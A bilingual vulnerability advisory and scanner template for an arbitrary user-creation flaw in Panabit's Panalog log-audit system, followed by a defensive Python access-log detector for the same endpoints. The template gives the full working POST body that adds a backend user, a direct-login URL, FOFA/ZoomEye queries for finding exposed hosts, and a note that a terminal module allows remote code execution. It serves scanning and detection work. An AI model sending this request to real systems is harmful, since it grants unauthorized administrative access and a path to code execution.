Vulnerability description
The Panabit log audit system (Panalog) has an arbitrary user addition vulnerability in singleuser_action.php; the backend also contains a terminal command module, which can lead to RCE.
Visiting https://x.x.x.x/singlelogin.php?userId=26062 logs you straight into the backend.
FOFA: app="Panabit-Panalog"
ZoomEye: app:"Panabit-Panalog"
id: panabit-singleuser-action-adduser

info:
  name: panabit日志审计 singleuser_action.php 任意用户添加漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    panabit日志审计存在 singleuser_action.php 任意用户添加漏洞,后台弱存在终端命令模块可rce。
    访问 https://x.x.x.x/singlelogin.php?userId=26062 即可进入后台
    FOFA: app="Panabit-Panalog"
    ZoomEye: app:"Panabit-Panalog"
  tags: panabit,adduser
  created: 2023/10/30

set:
  randInt: randomInt(10000, 99999)
  randName: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /singleuser_action.php
      headers:
        Content-Type: application/json
      body: |
        {"syncInfo": { "user": { "userId": "{{randInt}}", "userName": "{{randName}}", "employeeId": "119", "departmentId": "119", "departmentName": "119", "coporationId": "119", "corporationName": "119", "userSex": "1", "userDuty": "119", "userBirthday": "119", "userPost": "119", "userPostCode": "119", "userAlias": "119", "userRank": "119", "userPhone": "119", "userHomeAddress": "119", "userMobilePhone": "119", "userMailAddress": "119", "userMSN": "119", "userNt": "119", "userCA": "119", "userPwd": "119", "userClass": "119", "parentId": "119", "bxlx": "119" },"operationType": "ADD_USER" } }
    expression: |
      response.status == 200 &&
      response.body.bcontains(b"{\"yn\":\"yes\",\"str\":\"OK\"}")
expression: r0()
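A defender-side check for the two endpoints named above, added here as an example and not part of the template or of Panabit's own code: it scans web-server access logs (assumed to be in the common combined format; the sample lines are constructed) for POSTs to singleuser_action.php and for a userId-based singlelogin.php hit from a client that issued such a POST earlier, which is the add-then-login sequence the template relies on.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines (combined log format), not from the page.
# Client 203.0.113.5 posts to the user-creation action, then opens the userId
# login page; 198.51.100.7 only browses and logs in without a prior POST.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Oct/2023:10:15:01 +0800] "POST /singleuser_action.php HTTP/1.1" 200 27 "-" "python-requests/2.31"
203.0.113.5 - - [30/Oct/2023:10:15:03 +0800] "GET /singlelogin.php?userId=26062 HTTP/1.1" 302 0 "-" "python-requests/2.31"
198.51.100.7 - - [30/Oct/2023:10:16:10 +0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [30/Oct/2023:10:16:12 +0800] "GET /singlelogin.php?userId=1001 HTTP/1.1" 200 3411 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoints named in the advisory above.
ADD_USER_PATH = "/singleuser_action.php"
LOGIN_PATH = "/singlelogin.php"


def parse_line(line: str) -> Optional[Dict]:
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"], _, rec["query"] = rec["url"].partition("?")
    return rec


def find_suspicious(log_text: str) -> List[Dict]:
    """Alert on (1) any POST to the user-creation action, which should only come
    from the legitimate sync source, and (2) a userId-based login from a client
    that previously issued such a POST (the add-then-login chain)."""
    alerts: List[Dict] = []
    add_posters = set()
    for rec in filter(None, map(parse_line, log_text.splitlines())):
        if rec["method"] == "POST" and rec["path"] == ADD_USER_PATH:
            add_posters.add(rec["ip"])
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                           "reason": "post_to_singleuser_action"})
        elif (rec["path"] == LOGIN_PATH and rec["query"].startswith("userId=")
              and rec["ip"] in add_posters):
            alerts.append({"ip": rec["ip"], "ts": rec["ts"], "status": rec["status"],
                           "reason": "userid_login_after_add_user"})
    return alerts
```

The second client's userId login is deliberately not flagged on its own, since legitimate SSO use of singlelogin.php may look the same; the correlation with a prior POST is what separates the two.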